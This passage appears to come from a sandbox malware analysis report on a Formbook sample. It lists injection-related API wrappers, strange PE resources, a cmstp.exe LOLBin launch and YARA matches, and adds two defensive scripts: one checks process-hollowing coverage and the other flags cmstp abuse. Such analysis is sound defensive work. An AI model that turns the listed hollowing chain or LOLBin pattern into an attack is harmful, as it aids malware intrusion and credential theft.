Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC1FCE
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EB2782
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E15790
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC1746
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EB44EF
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EBDCC5
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC1C9F
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC2C9A
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EB3490
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E2547E
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EAF42B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E0740C
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E11410
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EA1DE3
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EAFDDB
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EBD5D2
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E9E58A
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EBE581
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06DF0D40
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E11530
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E9C53F
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EB1D1B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC2519
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06DD9528
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC22DD
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E142B0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC1A99
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E24A5B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E2523D
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EB0A02
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06ECE214
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E263C2
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06DFEBE0
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E24B96
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E1FB40
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06DD3314
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E4531D
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC28E8
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E248CB
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EA18B6
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E0A080
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E21070
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E2E020
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E20021
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E29810
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EBD016
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EC19E2
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06EB61DF
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06ECD9BE
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E26180
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E2594B
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E49906
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E27110
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: String function: 06DFB0E0 appears 176 times
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: String function: 06E4DDE8 appears 44 times
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: String function: 06E85110 appears 38 times
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 0343DDE8 appears 48 times
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 033EB0E0 appears 176 times
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: String function: 03475110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: String function: 06E45110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: String function: 06DBB0E0 appears 176 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: String function: 06E0DDE8 appears 48 times
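Two questions an analyst wants answered from the two listings above (the Nt* wrappers found per process, and the string decryption / allocating functions) are which processes expose a complete process-hollowing primitive set, and whether the three processes are running the same injected code at different base addresses. The leading number of each function id (1, 3, 13, 15) is the report's process index. The script below is an added example, not part of the Joe Sandbox report: it parses a constructed subset of the report's own lines (copied from the listings, with the raw extraction form also accepted), checks each process against one common hollowing chain, and derives the per-pair base displacement from the wrapper addresses, then confirms it against the string-function addresses. The chain ordering, the line regexes and the selection of sample lines are my assumptions.

```python
import re
from collections import defaultdict

# Constructed input: a subset of the report's own "Code function" and "String
# function" lines (copied from the listings above). The parser also accepts the
# raw extraction form without the " | " separator.
SAMPLE = r"""
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA6D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFA5A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | Code function: 1_2_06DFBA30 NtSetContextThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A6D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A4A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A5A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A700 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342BA30 NtSetContextThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_0342A720 NtResumeThread
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 3_2_003D6DA0 NtAllocateVirtualMemory
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 13_2_02AC0B93 NtProtectVirtualMemory
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 13_2_02AC0D70 NtResumeThread
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 13_2_02AC0D4E NtSetContextThread
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E3A720 NtResumeThread,LdrInitializeThunk
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E3A700 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E3A4A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E3A360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E3A6D0 NtCreateProcessEx
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E3A5A0 NtWriteVirtualMemory
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_06E3BA30 NtSetContextThread
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exe | Code function: 15_2_005C0B93 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\WWAHost.exe | String function: 033EB0E0 appears 176 times
Source: C:\Windows\SysWOW64\WWAHost.exe | String function: 03475110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | String function: 06E45110 appears 38 times
Source: C:\Users\user\Desktop\ACre0O2rKa.exe | String function: 06DBB0E0 appears 176 times
"""

CODE_RE = re.compile(r"Source: (?P<src>.+?\.exe)\W*Code function: (?P<pid>\d+)_\d+_(?P<addr>[0-9A-F]{8}) (?P<apis>[\w,]+)")
STR_RE = re.compile(r"Source: (?P<src>.+?\.exe)\W*String function: (?P<addr>[0-9A-F]{8}) appears (?P<n>\d+) times")

# One common process-hollowing chain (assumption: NtOpenProcess / NtMapViewOfSection /
# NtQueueApcThread variants of the same technique are not modelled here).
HOLLOWING_CHAIN = ("NtCreateProcessEx", "NtUnmapViewOfSection", "NtAllocateVirtualMemory",
                   "NtWriteVirtualMemory", "NtProtectVirtualMemory", "NtSetContextThread",
                   "NtResumeThread")

def parse_report(text):
    """Split report lines into Nt* wrapper records and string-function records."""
    funcs = [{"src": m["src"], "pid": int(m["pid"]), "addr": int(m["addr"], 16),
              # drop the trailing duplicated function id that the raw extraction carries
              "apis": [a for a in m["apis"].split(",") if a and not a[0].isdigit()]}
             for m in CODE_RE.finditer(text)]
    strfn = [{"src": m["src"], "addr": int(m["addr"], 16), "count": int(m["n"])}
             for m in STR_RE.finditer(text)]
    return funcs, strfn

def hollowing_coverage(funcs):
    """Per process index: the chain steps for which no wrapper appears in the listing."""
    seen = defaultdict(set)
    for f in funcs:
        seen[f["pid"]].update(f["apis"])
    return {pid: tuple(step for step in HOLLOWING_CHAIN if step not in apis)
            for pid, apis in seen.items()}

def shared_blob_delta(funcs, pid_a, pid_b):
    """Base displacement (b - a) if every Nt* wrapper the two processes have in common
    sits at one constant offset, i.e. they host the same code blob; otherwise None."""
    addrs = defaultdict(lambda: defaultdict(set))          # api -> pid -> {addresses}
    for f in funcs:
        for api in f["apis"]:
            if api.startswith("Nt"):
                addrs[api][f["pid"]].add(f["addr"])
    candidates = None
    for per_pid in addrs.values():
        if pid_a in per_pid and pid_b in per_pid:
            # a process may hold two copies of a wrapper (e.g. 0342A360 and 003D6DA0),
            # so keep every pairing and intersect the candidate deltas across APIs
            deltas = {b - a for a in per_pid[pid_a] for b in per_pid[pid_b]}
            candidates = deltas if candidates is None else candidates & deltas
    return next(iter(candidates)) if candidates and len(candidates) == 1 else None

def string_functions_shifted(funcs, strfn, pid_a, pid_b, delta):
    """(matched, total): string-function addresses of pid_a's image that land on one of
    pid_b's after adding delta; an independent check of the displacement."""
    src_of = {f["pid"]: f["src"] for f in funcs}
    a = {s["addr"] for s in strfn if s["src"] == src_of[pid_a]}
    b = {s["addr"] for s in strfn if s["src"] == src_of[pid_b]}
    return sum(1 for x in a if x + delta in b), len(a)

if __name__ == "__main__":
    funcs, strfn = parse_report(SAMPLE)
    for pid, missing in sorted(hollowing_coverage(funcs).items()):
        print(f"process {pid}: hollowing chain", "complete" if not missing else "missing " + ", ".join(missing))
    for a, b in ((1, 3), (3, 15), (13, 3)):
        d = shared_blob_delta(funcs, a, b)
        print(f"process {a} -> {b}:", "no common blob" if d is None else f"same blob, base delta {d:+#x}")
    print("string functions consistent with the 1 -> 3 delta:",
          string_functions_shifted(funcs, strfn, 1, 3, shared_blob_delta(funcs, 1, 3)))
```

On the sample, WWAHost.exe (process 3) and 5jd0x8e0uzsd8l.exe (process 15) expose every step of the chain; process 1 and process 3 share a blob displaced by 0x039D0000, process 3 and process 15 by 0x03A10000, and the two string functions of ACre0O2rKa.exe both land on WWAHost.exe addresses under that shift. Process 13's three wrappers are at mutually inconsistent displacements from process 3, so they belong to a different piece of code than the injected module. Feed the full listing to `parse_report` to get the same answers over every wrapper in the report.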
PE file contains strange resources
Source: ACre0O2rKa.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ACre0O2rKa.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5jd0x8e0uzsd8l.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 5jd0x8e0uzsd8l.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file name differs from the original file name gathered from version info
Source: ACre0O2rKa.exe, 00000000.00000002.579024409.0000000000492000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000000.00000002.579614105.00000000020D0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000000.00000002.579705323.0000000002220000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUsedly.exeFE2XFortogden7 vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000002.646807472.0000000006CA3000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameWWAHost.exej% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000002.647439064.0000000006EAF000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe, 00000001.00000000.577859120.0000000000492000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Source: ACre0O2rKa.exe | Binary or memory string: OriginalFilenameUsedly.exe vs ACre0O2rKa.exe
Searches the installation path of Mozilla Firefox
Source: C:\Windows\SysWOW64\WWAHost.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Mozilla\Mozilla Firefox\63.0.3 (x86 en-US)\Main Install Directory
Uses a Windows Living Off The Land binary (LOLBin)
Source: unknown | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
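The finding above is a single process-creation line: cmstp.exe (the Connection Manager profile installer, whose legitimate job is installing a service profile from an .inf file) started with no arguments and with a parent the sandbox could not attribute. The check below is an added example, not part of the report, showing how a detection engineer would score endpoint process-creation telemetry for this LOLBin. It works on records shaped like Sysmon Event ID 1 fields (Image, CommandLine, ParentImage); the records are constructed, with only the second one mirroring the report's argument-less launch. The allow-list of parent images and the list of user-writable directory fragments are my assumptions and need tuning per environment.

```python
import re
from pathlib import PureWindowsPath

# Parents that legitimately launch cmstp.exe in most estates: the shell, the
# Windows Installer and vendor setup programs (assumption; tune to the environment).
EXPECTED_PARENTS = {"explorer.exe", "msiexec.exe", "setup.exe"}
# Directory fragments a standard user can write to; a profile loaded from one
# of these, or from a UNC path, is suspicious (assumption).
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\programdata\\")
# The .inf argument, quoted (may contain spaces) or bare.
INF_RE = re.compile(r'"([^"]*\.inf)"|(\S+\.inf)', re.IGNORECASE)

# Constructed process-creation records shaped like Sysmon Event ID 1 fields.
# Record 1 mirrors the report's argument-less cmstp.exe; its parent is shown as
# "unknown" in the report, so ParentImage is left empty. The others are made up.
EVENTS = [
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r'cmstp.exe /s "C:\Program Files\CorpVPN\corpvpn.inf"',
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Image": r"C:\Windows\SysWOW64\cmstp.exe",
     "CommandLine": r"C:\Windows\SysWOW64\cmstp.exe",
     "ParentImage": ""},
    {"Image": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": r"cmstp.exe /ni /s C:\Users\user\AppData\Local\Temp\x.inf",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

def cmstp_findings(event):
    """Reasons a process-creation record for cmstp.exe looks like LOLBin abuse; () if clean."""
    if PureWindowsPath(event["Image"]).name.lower() != "cmstp.exe":
        return ()
    reasons = []
    m = INF_RE.search(event.get("CommandLine", ""))
    if m is None:
        # the binary's only job is to install a Connection Manager profile (.inf);
        # running it without one is not a normal administrative action
        reasons.append("no .inf profile argument")
    else:
        inf = m.group(1) or m.group(2)
        if inf.startswith("\\\\") or any(d in inf.lower() for d in USER_WRITABLE):
            reasons.append(f"profile from untrusted location: {inf}")
    parent = PureWindowsPath(event.get("ParentImage", "")).name.lower()
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent: {parent or 'unknown'}")
    return tuple(reasons)

def suspicious_indexes(events):
    """Indexes of the records that produced at least one finding."""
    return [i for i, e in enumerate(events) if cmstp_findings(e)]

if __name__ == "__main__":
    for i in suspicious_indexes(EVENTS):
        print(i, EVENTS[i]["CommandLine"], "->", "; ".join(cmstp_findings(EVENTS[i])))
```

The report's launch (record 1) is flagged on two counts, missing profile and unattributed parent; record 2, the silent-install pattern documented for this LOLBin with a profile dropped under the user's temp directory, is flagged on location and parent; the installer-driven launch in record 0 passes. Parent and command-line checks are kept separate so that each can be tuned or suppressed on its own.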
Yara signature match
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1108667062.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1135905056.0000000002B06000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.581346736.0000000002B46000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.644383876.0000000002130000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1100758053.0000000000401000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.1102548099.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.1133618575.0000000000660000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.1224240699.00000000003C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.1135372373.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.643192111.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000010.00000002.1108371563.0000000000170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.1109647512.0000000002AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.1102911809.0000000002160000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.1078601875.0000000002DC6000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.1133027358.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
